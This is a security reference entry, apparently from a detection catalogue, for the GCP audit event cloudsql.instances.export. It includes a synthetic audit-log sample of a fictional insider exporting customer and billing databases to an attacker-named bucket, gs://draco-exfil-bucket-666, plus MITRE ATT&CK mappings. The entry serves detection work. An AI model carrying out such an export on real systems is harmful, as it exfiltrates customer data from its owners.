cloudsql.instances.export
GCP
cloudsql.instances.export
Event
Exports data from a Cloud SQL instance to a Cloud Storage bucket.
Security Context
- Accessing cloud storage objects can expose sensitive data including backups, configuration files, application data, and customer information.
- Transferring data to external cloud accounts or regions can bypass network-based data loss prevention controls and exfiltrate large volumes of data.
Log Source
Cloud Audit Logs
Sample Event
Adversarial. Draco — already operating with occamy-pipeline@ impersonation — exports the entire niffler-archive Cloud SQL MySQL instance (production customer DB) as a SQL dump into the adversary-controlled gs://draco-exfil-bucket-666/cloudsql-dump/ URI. This is a single-API-call full-database exfil that bypasses table-level network controls.
{ "protoPayload": { "@type": "type.googleapis.com/google.cloud.audit.AuditLog", "status": {}, "authenticationInfo": { "principalEmail": "occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com", "principalSubject": "serviceAccount:occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com", "serviceAccountDelegationInfo": [ { "firstPartyPrincipal": { "principalEmail": "draco@fantasticlogs.cloud" } } ] }, "requestMetadata": { "callerIp": "203.0.113.66", "callerSuppliedUserAgent": "google-cloud-sdk gcloud/465.0.0 command/gcloud.sql.export.sql invocation-id/90000000000000000000001111101001 environment/None environment-version/None client-os/LINUX client-os-ver/(5,15,0) client-pltf-arch/x86_64 interactive/False from-script/False python/3.11.6 term/xterm-256color (Linux 5.15.0-1052-aws),gzip(gfe)", "requestAttributes": { "time": "2026-04-15T17:09:42.221987654Z", "auth": {} }, "destinationAttributes": {} }, "serviceName": "cloudsql.googleapis.com", "methodName": "cloudsql.instances.export", "authorizationInfo": [ { "resource": "projects/fantasticlogs-prod/instances/niffler-archive-mysql", "permission": "cloudsql.instances.export", "granted": true, "resourceAttributes": { "service": "cloudsql.googleapis.com", "name": "projects/fantasticlogs-prod/instances/niffler-archive-mysql", "type": "sqladmin.googleapis.com/Instance" } } ], "resourceName": "projects/fantasticlogs-prod/instances/niffler-archive-mysql", "request": { "@type": "type.googleapis.com/google.cloud.sql.v1beta4.SqlInstancesExportRequest", "project": "fantasticlogs-prod", "instance": "niffler-archive-mysql", "body": { "exportContext": { "kind": "sql#exportContext", "fileType": "SQL", "uri": "gs://draco-exfil-bucket-666/cloudsql-dump/niffler-archive-2026-04-15.sql.gz", "databases": [ "customers", "billing" ], "offload": false } } }, "response": { "@type": "type.googleapis.com/google.cloud.sql.v1beta4.Operation", "kind": "sql#operation", "name": "operation-1776278982-export-001111101001", "operationType": "EXPORT", "status": "PENDING", "user": "draco@fantasticlogs.cloud", "insertTime": "2026-04-15T17:09:42.300000000Z", "startTime": "2026-04-15T17:09:42.318000000Z", "targetId": "niffler-archive-mysql", "targetProject": "fantasticlogs-prod", "targetLink": "https://sqladmin.googleapis.com/sql/v1/projects/fantasticlogs-prod/instances/niffler-archive-mysql", "selfLink": "https://sqladmin.googleapis.com/sql/v1/projects/fantasticlogs-prod/operations/operation-1776278982-export-001111101001" } }, "insertId": "evt001111101001", "resource": { "type": "cloudsql_database", "labels": { "project_id": "fantasticlogs-prod", "database_id": "fantasticlogs-prod:niffler-archive-mysql", "region": "us-central1" } }, "timestamp": "2026-04-15T17:09:42.187654321Z", "severity": "INFO", "logName": "projects/fantasticlogs-prod/logs/cloudaudit.googleapis.com%2Fdata_access", "operation": { "id": "operation-1776278982-export-001111101001", "producer": "cloudsql.googleapis.com", "first": true }, "receiveTimestamp": "2026-04-15T17:09:42.567890123Z"}MITRE ATT&CK Mapping
Tactics: Exfiltration Collection
Techniques:
- T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
- T1530 — Data from Cloud Storage — Adversaries may access data from cloud storage.